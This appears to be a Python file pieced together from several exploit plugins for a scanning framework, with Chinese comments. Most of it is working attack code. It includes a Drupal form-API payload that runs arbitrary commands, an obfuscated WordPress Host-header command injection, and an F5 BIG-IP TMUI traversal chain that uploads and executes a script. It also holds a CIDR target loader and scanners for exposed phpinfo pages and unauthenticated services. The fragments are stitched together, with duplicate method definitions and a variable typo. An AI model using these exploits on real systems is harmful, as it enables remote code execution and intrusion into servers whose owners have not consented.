def init(self):
info_msg = "[PLUGIN] try fetch targets from CIDR..."
logger.info(info_msg)
cidr_text = ""
if "CIDR" in os.environ:
cidr_text = os.environ.get("CIDR")
elif conf.url:
cidr_text = conf.url
conf.url = ""
else:
cidr_text = input("Please input CIDR address:")
count = 0
try:
network = ip_network(cidr_text, strict=False)
for host in network.hosts():
self.add_target(host.exploded)
count += 1
except ValueError:
logger.error("[PLUGIN] error format from " + cidr_text)
info_msg = "[PLUGIN] get {0} target(s) from CIDR".format(count)
logger.info(info_msg)
def _attack(self):
result = {}
cmd = self.get_option("command")
url = self.url.rstrip(
'/'
) + "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
payload = {
'form_id': 'user_register_form',
'_drupal_ajax': '1',
'mail[#post_render][]': 'exec',
'mail[#type]': 'markup',
'mail[#markup]': '{}'.format(cmd)
}
try:
response = requests.post(url, data=payload)
if response and response.status_code == 200:
result['Stdout'] = json.loads(response.text)[0]['data']
except Exception as ex:
logger.error(str(ex))
return self.parse_output(result)
def _verify(self):
result = {}
flag = random_str(length=10)
url = self.url.rstrip(
'/') + "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
payload = {
'form_id': 'user_register_form',
'_drupal_ajax': '1',
'mail[#post_render][]': 'exec',
'mail[#type]': 'markup',
'mail[#markup]': 'echo "{0}";'.format(flag)
}
resp = requests.post(url, data=payload)
try:
if '"data":"{0}'.format(flag) in resp.text:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['Postdata'] = payload
except Exception as ex:
logger.error(str(ex))
return self.parse_output(result)
def _verify(self):
result = {}
filename = random_str(6) + '.txt'
filename = filename.lower()
url = urljoin(self.url, 'wp-login.php?action=lostpassword')
cmd = '''{{run{{/bin/touch {abspathfilename}}}}}'''.format(
abspathfilename=os.path.join(self.get_option('writePath'),
filename))
cmd = cmd.replace(' ', '${substr{10}{1}{$tod_log}}').replace(
'/', '${substr{0}{1}{$spool_directory}}')
# replace
# ' ' -> '${substr{10}{1}{$tod_log}}'
# '/' -> '${substr{0}{1}{$spool_directory}}'
urlsp = urlsplit(url)
payload = '{netloc}(any -froot@localhost -be ${cmd} null)'.format(
netloc=urlsp.netloc.split(':')[0], cmd=cmd)
# 该payload的Host字段不能出现端口信息,否则无法成功,也就是说只能打默认80端口
headers = {
'Host': payload,
'Content-Type': 'application/x-www-form-urlencoded'
}
data = {
'wp-admin': 'Get+New+Password',
'redirect_to': '',
'user_login': self.get_option('username')
}
r = requests.post(url=url, headers=headers, data=data)
resp = requests.get(url=urljoin(self.url, filename))
try:
if resp.status_code == 200:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['Postdata'] = payload
except Exception as ex:
logger.error(str(ex))
return self.parse_output(result)
def _verify(self):
result = {}
headers = {
'User-Agent':
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36',
}
phpinfoList = ['/phpinfo.php', '/1.php', '/test.php']
for path in phpinfoList:
vulurl = "{}{}".format(self.url.rstrip('/'), path)
try:
resp = requests.get(url=vulurl,
headers=headers,
timeout=3,
verify=False)
if "PHP Version" in resp.text and resp.status_code == 200:
result['VerifyInfo'] = {}
result['VerifyInfo']['url'] = vulurl
return self.parse_attack(result)
except Exception as e:
logger.error("connect target '{} failed!'".format(vulurl))
pass
return self.parse_attack(result)
def _verify(self):
"""verify mode"""
result = {}
pr = urlparse(self.url)
ip = pr.hostname
res_info = []
try:
res = self.redis(ip)
res_info.append(res)
res = self.mongodb(ip)
res_info.append(res)
res = self.memcached(ip)
res_info.append(res)
res = self.elasticsearch(ip)
res_info.append(res)
res = self.zookeeper(ip)
res_info.append(res)
res = self.ftp(ip)
res_info.append(res)
res = self.CouchDB(ip)
res_info.append(res)
res = self.docker(ip)
res_info.append(res)
res = self.Hadoop(ip)
res_info.append(res)
res_sring = ""
for ri in res_info:
if ri != False:
res_string = res_string + ";" + ri
if res_string != "":
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = ip
result['VerifyInfo']['Info'] = res_info
except Exception as ex:
logger.error(str(ex))
return self.parse_output(result)
def _verify(self):
result = {}
randstr = random_str()
protocol, host, port, rpath = self.parse_url(self.url)
url = protocol + "://" + str(host) + ":" + str(port)
fileName = "/var/tmp/tdfgjkl" # 写到目标的
cmd = "id" # // ==> \/\/
headers = {
"User-Agent":
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0"
}
def create_alias(): # 开启bash
payload = "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp"
headers = {
"User-Agent":
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0",
"Accept":
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Connection": "close",
"Upgrade-Insecure-Requests": "1",
"Content-Type": "application/x-www-form-urlencoded"
}
data = {"command": "create cli alias private list command bash"}
req = requests.post(url + payload, headers=headers, data=data)
if req.json()['error'] == "":
return True
def upload_script(fileName,
cmd): # fileName ==> /tmp/ljkkasdv 任意文件上传
payload = "/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp"
headers = {
"User-Agent":
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0",
"Accept":
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Connection": "close",
"Upgrade-Insecure-Requests": "1",
"Content-Type": "application/x-www-form-urlencoded"
}
data = {"fileName": fileName, "content": cmd}
req = requests.post(url + payload, headers=headers, data=data)
if req.status_code == 200:
return True
def upload_check(fileName, cmd): # 任意文件读取
payload = "/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName={}".format(
fileName)
headers = {
"User-Agent":
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0",
"Accept":
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Connection": "close",
"Upgrade-Insecure-Requests": "1"
}
req = requests.get(url + payload, headers=headers)
if cmd.replace("/", "\\/") in req.text:
logger.info("[+] Upload Success ! ==> {}".format(url +
payload))
return True
def execute_script(fileName): # if "uid" in
payload = "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp"
headers = {
"User-Agent":
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0",
"Accept":
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Connection": "close",
"Upgrade-Insecure-Requests": "1",
"Content-Type": "application/x-www-form-urlencoded"
}
data = {"command": "list {}".format(fileName)}
for i in range(0, 10): # 重复多次可能会成功,一般是4次
req = requests.post(url + payload, headers=headers, data=data)
if req.json()['error'] == "" and "uid" in req.text:
print(req.text)
logger.info("[+] Execute OK, Having a check ...")
return True
def delete_alias():
payload = "/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp"
headers = {
"User-Agent":
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0",
"Accept":
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language":
"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Connection": "close",
"Upgrade-Insecure-Requests": "1",
"Content-Type": "application/x-www-form-urlencoded"
}
data = {"command": "delete cli alias private list"}
req = requests.post(url + payload, headers=headers, data=data)
if req.json()['error'] == "":
return True
try:
delete_alias() # 可能被别人别名了,第一步先尝试删除别名不然可能报错!!!
if create_alias():
if upload_script(fileName, cmd):
if upload_check(fileName, cmd):
if execute_script(fileName):
if delete_alias():
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = url
result['VerifyInfo']['Port'] = str(port)
return self.parse_output(result)
except Exception as ex:
logger.error(ex)